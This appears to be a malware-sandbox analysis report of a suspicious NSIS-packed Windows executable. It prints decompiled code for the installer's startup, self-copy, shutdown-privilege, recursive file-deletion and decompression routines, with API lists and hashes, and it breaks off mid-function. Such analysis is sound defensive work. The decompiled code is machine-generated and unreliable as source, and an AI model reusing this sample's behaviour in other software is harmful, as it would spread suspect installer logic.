              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: ABD05EB5C5130CBFCB04EFE0CC4689EBF7CDF51201F10859ABC006B100DA759B109A94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Executed Functions

              C-Code - Quality: 81%
              			_entry_() {
              				signed int _t51;
              				intOrPtr* _t56;
              				WCHAR* _t60;
              				char* _t62;
              				void* _t65;
              				void* _t67;
              				int _t69;
              				int _t71;
              				int _t74;
              				intOrPtr* _t75;
              				int _t76;
              				int _t78;
              				void* _t102;
              				signed int _t119;
              				void* _t122;
              				void* _t127;
              				intOrPtr _t146;
              				intOrPtr _t147;
              				intOrPtr* _t148;
              				int _t150;
              				void* _t153;
              				int _t154;
              				signed int _t158;
              				signed int _t163;
              				signed int _t168;
              				void* _t170;
              				void* _t172;
              				int* _t174;
              				signed int _t180;
              				signed int _t183;
              				CHAR* _t184;
              				WCHAR* _t185;
              				void* _t191;
              				char* _t192;
              				void* _t195;
              				void* _t196;
              				void* _t242;
              
              				_t170 = 0x20;
              				_t150 = 0;
              				 *(_t196 + 0x14) = 0;
              				 *(_t196 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
              				 *(_t196 + 0x1c) = 0;
              				SetErrorMode(0x8001); // executed
              				_t51 = GetVersion() & 0xbfffffff;
              				 *0x42a26c = _t51;
              				if(_t51 != 6) {
              					_t148 = E00406931(0);
              					if(_t148 != 0) {
              						 *_t148(0xc00);
              					}
              				}
              				_t184 = "UXTHEME";
              				goto L4;
              				L8:
              				__imp__#17(_t191);
              				__imp__OleInitialize(_t150); // executed
              				 *0x42a338 = _t56;
              				SHGetFileInfoW(0x421708, _t150, _t196 + 0x34, 0x2b4, _t150); // executed
              				E0040653C(0x429260, L"NSIS Error");
              				_t60 = GetCommandLineW();
              				_t192 = L"\"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe\" ";
              				E0040653C(_t192, _t60);
              				 *0x42a260 = 0x400000;
              				_t62 = _t192;
              				if(L"\"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe\" " == 0x22) {
              					_t62 =  &M00435002;
              					_t170 = 0x22;
              				}
              				_t154 = CharNextW(E00405E3E(_t62, _t170));
              				 *(_t196 + 0x18) = _t154;
              				_t65 =  *_t154;
              				if(_t65 == _t150) {
              					L33:
              					_t185 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
              					GetTempPathW(0x400, _t185);
              					_t67 = E004035A7(_t154, 0);
              					_t224 = _t67;
              					if(_t67 != 0) {
              						L36:
              						DeleteFileW(L"1033"); // executed
              						_t69 = E00403068(_t226,  *(_t196 + 0x1c)); // executed
              						 *(_t196 + 0x10) = _t69;
              						if(_t69 != _t150) {
              							L48:
              							E00403B19();
              							__imp__OleUninitialize();
              							_t238 =  *(_t196 + 0x10) - _t150;
              							if( *(_t196 + 0x10) == _t150) {
              								__eflags =  *0x42a314 - _t150;
              								if( *0x42a314 == _t150) {
              									L72:
              									_t71 =  *0x42a32c;
              									__eflags = _t71 - 0xffffffff;
              									if(_t71 != 0xffffffff) {
              										 *(_t196 + 0x10) = _t71;
              									}
              									ExitProcess( *(_t196 + 0x10));
              								}
              								_t74 = OpenProcessToken(GetCurrentProcess(), 0x28, _t196 + 0x14);
              								__eflags = _t74;
              								if(_t74 != 0) {
              									LookupPrivilegeValueW(_t150, L"SeShutdownPrivilege", _t196 + 0x20);
              									 *(_t196 + 0x34) = 1;
              									 *(_t196 + 0x40) = 2;
              									AdjustTokenPrivileges( *(_t196 + 0x28), _t150, _t196 + 0x24, _t150, _t150, _t150);
              								}
              								_t75 = E00406931(4);
              								__eflags = _t75 - _t150;
              								if(_t75 == _t150) {
              									L70:
              									_t76 = ExitWindowsEx(2, 0x80040002);
              									__eflags = _t76;
              									if(_t76 != 0) {
              										goto L72;
              									}
              									goto L71;
              								} else {
              									_t78 =  *_t75(_t150, _t150, _t150, 0x25, 0x80040002);
              									__eflags = _t78;
              									if(_t78 == 0) {
              										L71:
              										E0040140B(9);
              										goto L72;
              									}
              									goto L70;
              								}
              							}
              							E00405BA2( *(_t196 + 0x10), 0x200010);
              							ExitProcess(2);
              						}
              						if( *0x42a280 == _t150) {
              							L47:
              							 *0x42a32c =  *0x42a32c | 0xffffffff;
              							 *(_t196 + 0x14) = E00403C0B( *0x42a32c);
              							goto L48;
              						}
              						_t174 = E00405E3E(_t192, _t150);
              						if(_t174 < _t192) {
              							L44:
              							_t235 = _t174 - _t192;
              							 *(_t196 + 0x10) = L"Error launching installer";
              							if(_t174 < _t192) {
              								_t172 = E00405B0D(_t238);
              								lstrcatW(_t185, L"~nsu");
              								if(_t172 != _t150) {
              									lstrcatW(_t185, "A");
              								}
              								lstrcatW(_t185, L".tmp");
              								_t194 = L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs";
              								if(lstrcmpiW(_t185, L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs") != 0) {
              									_push(_t185);
              									if(_t172 == _t150) {
              										E00405AF0();
              									} else {
              										E00405A73();
              									}
              									SetCurrentDirectoryW(_t185);
              									_t242 = L"C:\\Users\\jones\\AppData\\Local\\Temp" - _t150; // 0x43
              									if(_t242 == 0) {
              										E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t194);
              									}
              									E0040653C(0x42b000,  *(_t196 + 0x18));
              									_t155 = "A" & 0x0000ffff;
              									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
              									_t195 = 0x1a;
              									do {
              										E00406579(_t150, 0x420f08, _t185, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x120)));
              										DeleteFileW(0x420f08);
              										if( *(_t196 + 0x10) != _t150 && CopyFileW(L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe", 0x420f08, 1) != 0) {
              											E00406302(_t155, 0x420f08, _t150);
              											E00406579(_t150, 0x420f08, _t185, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x124)));
              											_t102 = E00405B25(0x420f08);
              											if(_t102 != _t150) {
              												CloseHandle(_t102);
              												 *(_t196 + 0x10) = _t150;
              											}
              										}
              										 *0x42b800 =  *0x42b800 + 1;
              										_t195 = _t195 - 1;
              									} while (_t195 != 0);
              									E00406302(_t155, _t185, _t150);
              								}
              								goto L48;
              							}
              							 *_t174 = _t150;
              							_t175 =  &(_t174[2]);
              							if(E00405F19(_t235,  &(_t174[2])) == 0) {
              								goto L48;
              							}
              							E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t175);
              							E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t175);
              							 *(_t196 + 0x10) = _t150;
              							goto L47;
              						}
              						asm("cdq");
              						asm("cdq");
              						asm("cdq");
              						_t158 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
              						_t119 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t163 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
              						while( *_t174 != _t158 || _t174[1] != _t119) {
              							_t174 = _t174;
              							if(_t174 >= _t192) {
              								continue;
              							}
              							break;
              						}
              						_t150 = 0;
              						goto L44;
              					}
              					GetWindowsDirectoryW(_t185, 0x3fb);
              					lstrcatW(_t185, L"\\Temp");
              					_t122 = E004035A7(_t154, _t224);
              					_t225 = _t122;
              					if(_t122 != 0) {
              						goto L36;
              					}
              					GetTempPathW(0x3fc, _t185);
              					lstrcatW(_t185, L"Low");
              					SetEnvironmentVariableW(L"TEMP", _t185);
              					SetEnvironmentVariableW(L"TMP", _t185);
              					_t127 = E004035A7(_t154, _t225);
              					_t226 = _t127;
              					if(_t127 == 0) {
              						goto L48;
              					}
              					goto L36;
              				} else {
              					do {
              						_t153 = 0x20;
              						if(_t65 != _t153) {
              							L13:
              							if( *_t154 == 0x22) {
              								_t154 = _t154 + 2;
              								_t153 = 0x22;
              							}
              							if( *_t154 != 0x2f) {
              								goto L27;
              							} else {
              								_t154 = _t154 + 2;
              								if( *_t154 == 0x53) {
              									_t147 =  *((intOrPtr*)(_t154 + 2));
              									if(_t147 == 0x20 || _t147 == 0) {
              										 *0x42a320 = 1;
              									}
              								}
              								asm("cdq");
              								asm("cdq");
              								_t168 = L"NCRC" & 0x0000ffff;
              								asm("cdq");
              								_t180 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t168;
              								if( *_t154 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t168) &&  *((intOrPtr*)(_t154 + 4)) == _t180) {
              									_t146 =  *((intOrPtr*)(_t154 + 8));
              									if(_t146 == 0x20 || _t146 == 0) {
              										 *(_t196 + 0x1c) =  *(_t196 + 0x1c) | 0x00000004;
              									}
              								}
              								asm("cdq");
              								asm("cdq");
              								_t163 = L" /D=" & 0x0000ffff;
              								asm("cdq");
              								_t183 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t163;
              								if( *(_t154 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t163) ||  *_t154 != _t183) {
              									goto L27;
              								} else {
              									 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
              									__eflags = _t154;
              									E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
              									L32:
              									_t150 = 0;
              									goto L33;
              								}
              							}
              						} else {
              							goto L12;
              						}
              						do {
              							L12:
              							_t154 = _t154 + 2;
              						} while ( *_t154 == _t153);
              						goto L13;
              						L27:
              						_t154 = E00405E3E(_t154, _t153);
              						if( *_t154 == 0x22) {
              							_t154 = _t154 + 2;
              						}
              						_t65 =  *_t154;
              					} while (_t65 != 0);
              					goto L32;
              				}
              				L4:
              				E004068C1(_t184); // executed
              				_t184 =  &(_t184[lstrlenA(_t184) + 1]);
              				if( *_t184 != 0) {
              					goto L4;
              				} else {
              					E00406931(0xb);
              					 *0x42a264 = E00406931(9);
              					_t56 = E00406931(7);
              					if(_t56 != _t150) {
              						_t56 =  *_t56(0x1e);
              						if(_t56 != 0) {
              							 *0x42a26f =  *0x42a26f | 0x00000040;
              						}
              					}
              					goto L8;
              				}
              			}


              APIs
              • SetErrorMode.KERNELBASE ref: 004035FB
              • GetVersion.KERNEL32 ref: 00403601
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
              • OleInitialize.OLE32(00000000), ref: 00403678
              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
              • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
              • CharNextW.USER32(00000000,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,00000020,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,00000000,?,00000007,00000009,0000000B), ref: 004036E1
                • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403838
              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403854
              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
              • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
              • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
              • ExitProcess.KERNEL32 ref: 0040396D
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403980
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040398F
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040399A
              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
              • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
              • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
              • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
              • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
              • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
              • ExitProcess.KERNEL32 ref: 00403B13
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\tteegmiuoefs$C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
              • API String ID: 3441113951-1863211717
              • Opcode ID: 8ac029ab22eb7184ad5584a5e27cb41e00d28439acf5d8243c8b0e7e81677052
              • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
              • Opcode Fuzzy Hash: 8ac029ab22eb7184ad5584a5e27cb41e00d28439acf5d8243c8b0e7e81677052
              • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00405C4E(void* __eflags, signed int _a4, signed int _a8) {
              				signed int _v8;
              				signed int _v12;
              				short _v556;
              				short _v558;
              				struct _WIN32_FIND_DATAW _v604;
              				signed int _t38;
              				signed int _t52;
              				signed int _t55;
              				signed int _t62;
              				void* _t64;
              				signed char _t65;
              				WCHAR* _t66;
              				void* _t67;
              				WCHAR* _t68;
              				void* _t70;
              
              				_t65 = _a8;
              				_t68 = _a4;
              				_v8 = _t65 & 0x00000004;
              				_t38 = E00405F19(__eflags, _t68);
              				_v12 = _t38;
              				if((_t65 & 0x00000008) != 0) {
              					_t62 = DeleteFileW(_t68); // executed
              					asm("sbb eax, eax");
              					_t64 =  ~_t62 + 1;
              					 *0x42a308 =  *0x42a308 + _t64;
              					return _t64;
              				}
              				_a4 = _t65;
              				_t8 =  &_a4;
              				 *_t8 = _a4 & 0x00000001;
              				__eflags =  *_t8;
              				if( *_t8 == 0) {
              					L5:
              					E0040653C(0x425750, _t68);
              					__eflags = _a4;
              					if(_a4 == 0) {
              						E00405E5D(_t68);
              					} else {
              						lstrcatW(0x425750, L"\\*.*");
              					}
              					__eflags =  *_t68;
              					if( *_t68 != 0) {
              						L10:
              						lstrcatW(_t68, 0x40a014);
              						L11:
              						_t66 =  &(_t68[lstrlenW(_t68)]);
              						_t38 = FindFirstFileW(0x425750,  &_v604);
              						_t70 = _t38;
              						__eflags = _t70 - 0xffffffff;
              						if(_t70 == 0xffffffff) {
              							L26:
              							__eflags = _a4;
              							if(_a4 != 0) {
              								_t30 = _t66 - 2;
              								 *_t30 =  *(_t66 - 2) & 0x00000000;
              								__eflags =  *_t30;
              							}
              							goto L28;
              						} else {
              							goto L12;
              						}
              						do {
              							L12:
              							__eflags = _v604.cFileName - 0x2e;
              							if(_v604.cFileName != 0x2e) {
              								L16:
              								E0040653C(_t66,  &(_v604.cFileName));
              								__eflags = _v604.dwFileAttributes & 0x00000010;
              								if(__eflags == 0) {
              									_t52 = E00405C06(__eflags, _t68, _v8);
              									__eflags = _t52;
              									if(_t52 != 0) {
              										E004055A4(0xfffffff2, _t68);
              									} else {
              										__eflags = _v8 - _t52;
              										if(_v8 == _t52) {
              											 *0x42a308 =  *0x42a308 + 1;
              										} else {
              											E004055A4(0xfffffff1, _t68);
              											E00406302(_t67, _t68, 0);
              										}
              									}
              								} else {
              									__eflags = (_a8 & 0x00000003) - 3;
              									if(__eflags == 0) {
              										E00405C4E(__eflags, _t68, _a8);
              									}
              								}
              								goto L24;
              							}
              							__eflags = _v558;
              							if(_v558 == 0) {
              								goto L24;
              							}
              							__eflags = _v558 - 0x2e;
              							if(_v558 != 0x2e) {
              								goto L16;
              							}
              							__eflags = _v556;
              							if(_v556 == 0) {
              								goto L24;
              							}
              							goto L16;
              							L24:
              							_t55 = FindNextFileW(_t70,  &_v604);
              							__eflags = _t55;
              						} while (_t55 != 0);
              						_t38 = FindClose(_t70);
              						goto L26;
              					}
              					__eflags =  *0x425750 - 0x5c;
              					if( *0x425750 != 0x5c) {
              						goto L11;
              					}
              					goto L10;
              				} else {
              					__eflags = _t38;
              					if(_t38 == 0) {
              						L28:
              						__eflags = _a4;
              						if(_a4 == 0) {
              							L36:
              							return _t38;
              						}
              						__eflags = _v12;
              						if(_v12 != 0) {
              							_t38 = E0040689A(_t68);
              							__eflags = _t38;
              							if(_t38 == 0) {
              								goto L36;
              							}
              							E00405E11(_t68);
              							_t38 = E00405C06(__eflags, _t68, _v8 | 0x00000001);
              							__eflags = _t38;
              							if(_t38 != 0) {
              								return E004055A4(0xffffffe5, _t68);
              							}
              							__eflags = _v8;
              							if(_v8 == 0) {
              								goto L30;
              							}
              							E004055A4(0xfffffff1, _t68);
              							return E00406302(_t67, _t68, 0);
              						}
              						L30:
              						 *0x42a308 =  *0x42a308 + 1;
              						return _t38;
              					}
              					__eflags = _t65 & 0x00000002;
              					if((_t65 & 0x00000002) == 0) {
              						goto L28;
              					}
              					goto L5;
              				}
              			}


              APIs
              • DeleteFileW.KERNELBASE(?,?,73BCFAA0,73BCF560,00000000), ref: 00405C77
              • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405CBF
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405CE2
              • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,73BCFAA0,73BCF560,00000000), ref: 00405CE8
              • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,73BCFAA0,73BCF560,00000000), ref: 00405CF8
              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
              • FindClose.KERNEL32(00000000), ref: 00405DA7
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $PWB$\*.*
              • API String ID: 2035342205-3705515666
              • Opcode ID: 19551799e8c5b82fe64fd6c9cdad713e8761b335c3851407baa620d6eabf161c
              • Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
              • Opcode Fuzzy Hash: 19551799e8c5b82fe64fd6c9cdad713e8761b335c3851407baa620d6eabf161c
              • Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00406C5B() {
              				unsigned short _t531;
              				signed int _t532;
              				void _t533;
              				void* _t534;
              				signed int _t535;
              				signed int _t565;
              				signed int _t568;
              				signed int _t590;
              				signed int* _t607;
              				void* _t614;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t614 - 0x40) != 0) {
              						 *(_t614 - 0x34) = 1;
              						 *(_t614 - 0x84) = 7;
              						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
              						L132:
              						 *(_t614 - 0x54) = _t607;
              						L133:
              						_t531 =  *_t607;
              						_t590 = _t531 & 0x0000ffff;
              						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
              						if( *(_t614 - 0xc) >= _t565) {
              							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
              							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
              							 *(_t614 - 0x40) = 1;
              							_t532 = _t531 - (_t531 >> 5);
              							 *_t607 = _t532;
              						} else {
              							 *(_t614 - 0x10) = _t565;
              							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
              							 *_t607 = (0x800 - _t590 >> 5) + _t531;
              						}
              						if( *(_t614 - 0x10) >= 0x1000000) {
              							L139:
              							_t533 =  *(_t614 - 0x84);
              							L140:
              							 *(_t614 - 0x88) = _t533;
              							goto L1;
              						} else {
              							L137:
              							if( *(_t614 - 0x6c) == 0) {
              								 *(_t614 - 0x88) = 5;
              								goto L170;
              							}
              							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
              							goto L139;
              						}
              					} else {
              						__eax =  *(__ebp - 0x5c) & 0x000000ff;
              						__esi =  *(__ebp - 0x60);
              						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              						__ecx =  *(__ebp - 0x3c);
              						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              						__ecx =  *(__ebp - 4);
              						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              						if( *(__ebp - 0x38) >= 4) {
              							if( *(__ebp - 0x38) >= 0xa) {
              								_t97 = __ebp - 0x38;
              								 *_t97 =  *(__ebp - 0x38) - 6;
              							} else {
              								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              							}
              						} else {
              							 *(__ebp - 0x38) = 0;
              						}
              						if( *(__ebp - 0x34) == __edx) {
              							__ebx = 0;
              							__ebx = 1;
              							L60:
              							__eax =  *(__ebp - 0x58);
              							__edx = __ebx + __ebx;
              							__ecx =  *(__ebp - 0x10);
              							__esi = __edx + __eax;
              							__ecx =  *(__ebp - 0x10) >> 0xb;
              							__ax =  *__esi;
              							 *(__ebp - 0x54) = __esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								_t216 = __edx + 1; // 0x1
              								__ebx = _t216;
              								__cx = __ax >> 5;
              								 *__esi = __ax;
              							} else {
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							 *(__ebp - 0x44) = __ebx;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								L59:
              								if(__ebx >= 0x100) {
              									goto L54;
              								}
              								goto L60;
              							} else {
              								L57:
              								if( *(__ebp - 0x6c) == 0) {
              									 *(__ebp - 0x88) = 0xf;
              									goto L170;
              								}
              								__ecx =  *(__ebp - 0x70);
              								__eax =  *(__ebp - 0xc);
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              								_t202 = __ebp - 0x70;
              								 *_t202 =  *(__ebp - 0x70) + 1;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              								goto L59;
              							}
              						} else {
              							__eax =  *(__ebp - 0x14);
              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              							if(__eax >=  *(__ebp - 0x74)) {
              								__eax = __eax +  *(__ebp - 0x74);
              							}
              							__ecx =  *(__ebp - 8);
              							__ebx = 0;
              							__ebx = 1;
              							__al =  *((intOrPtr*)(__eax + __ecx));
              							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              							L40:
              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              							__ecx =  *(__ebp - 0x58);
              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              							 *(__ebp - 0x48) = __eax;
              							__eax = __eax + 1;
              							__eax = __eax << 8;
              							__eax = __eax + __ebx;
              							__esi =  *(__ebp - 0x58) + __eax * 2;
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              							__ax =  *__esi;
              							 *(__ebp - 0x54) = __esi;
              							__edx = __ax & 0x0000ffff;
